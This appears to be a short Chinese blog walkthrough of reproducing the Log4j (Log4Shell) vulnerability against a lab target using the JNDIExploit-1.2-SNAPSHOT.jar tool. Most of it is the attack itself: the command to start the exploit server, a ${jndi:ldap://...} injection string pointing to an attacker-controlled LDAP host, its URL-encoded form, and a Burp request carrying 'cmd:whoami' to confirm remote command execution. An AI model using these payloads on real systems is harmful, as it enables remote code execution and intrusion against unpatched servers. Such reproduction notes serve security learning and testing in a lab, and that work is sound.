JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

1.首先搭建log4j靶场

2.开启服务

Windows攻击端执行以下命令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1

再开一个cmd可以看下能用什么payload

java -jar JNDIExploit-1.2-SNAPSHOT.jar -u

以上payload都可以尝试,我们使用

ldap://null:1389/TomcatBypass/TomcatEcho

3.构造请求

${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}

转成URL

%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D

4.开启bp

请求包中增加cmd:whoami

执行后发现命令可以执行

相关推荐
Java小王子呀8 小时前
Java实现Excel转PDF
java·pdf·excel
得物技术8 小时前
从一次启动失败深入剖析:Spring循环依赖的真相|得物技术
java·后端
程序猿DD8 小时前
Jackson 序列化的隐性成本
java·后端
凤山老林9 小时前
SpringBoot 如何实现零拷贝:深度解析零拷贝技术
java·linux·开发语言·arm开发·spring boot·后端
程序员小假9 小时前
我们来讲一讲阻塞队列及其应用
java·后端
带刺的坐椅9 小时前
snack4-jsonpath v4.0.2 发布
java·jsonpath
W.Buffer10 小时前
Java并发工具类详解:Semaphore、CyclicBarrier与CountDownLatch
java·开发语言
鼠鼠我捏,要死了捏10 小时前
深度解析JVM GC调优实践指南
java·jvm·gc
IT·陈寒10 小时前
当 JVM 开始“内卷”:一次性能优化引发的 GC 战争
java·jvm·性能优化